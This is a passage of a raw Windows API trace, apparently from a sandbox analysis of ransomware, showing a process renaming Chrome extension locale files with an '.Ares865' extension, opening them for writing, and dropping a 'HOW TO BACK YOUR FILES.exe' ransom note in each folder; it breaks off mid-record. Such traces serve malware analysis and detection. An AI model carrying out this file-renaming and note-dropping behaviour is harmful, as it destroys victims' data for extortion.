MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.732] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=334) returned 1 [0101.735] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru" [0101.735] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru" [0101.735] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.735] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.736] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.736] GetLastError () returned 0x0 [0101.736] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.736] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a3c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6f08e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6f08e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.736] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.736] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.736] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.737] lstrlenW (lpString="messages.json") returned 13 [0101.737] lstrlenW (lpString="Ares865") returned 7 [0101.737] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.737] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.Ares865") returned 160 [0101.737] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.739] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=281) returned 1 [0101.742] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro" [0101.742] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro" [0101.742] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.742] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.742] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.743] GetLastError () returned 0x0 [0101.743] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.743] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a3c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e6f08e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e6f08e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.743] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.743] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.743] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.743] lstrlenW (lpString="messages.json") returned 13 [0101.743] lstrlenW (lpString="Ares865") returned 7 [0101.743] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.744] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.Ares865") returned 160 [0101.744] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.745] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=175) returned 1 [0101.748] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT" [0101.748] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT" [0101.748] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.748] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.749] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.749] GetLastError () returned 0x0 [0101.749] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.749] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f54260, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e716a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e716a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.750] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.750] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.750] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.750] lstrlenW (lpString="messages.json") returned 13 [0101.750] lstrlenW (lpString="Ares865") returned 7 [0101.750] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.750] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.Ares865") returned 163 [0101.750] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.752] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=198) returned 1 [0101.755] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR" [0101.755] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR" [0101.755] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.755] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.756] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.756] GetLastError () returned 0x0 [0101.756] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f54260, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e716a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e716a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.756] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.757] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.757] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.757] lstrlenW (lpString="messages.json") returned 13 [0101.757] lstrlenW (lpString="Ares865") returned 7 [0101.757] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.757] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.Ares865") returned 163 [0101.757] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.759] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=187) returned 1 [0101.762] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl" [0101.762] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl" [0101.762] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.762] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.763] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.763] GetLastError () returned 0x0 [0101.763] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.763] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 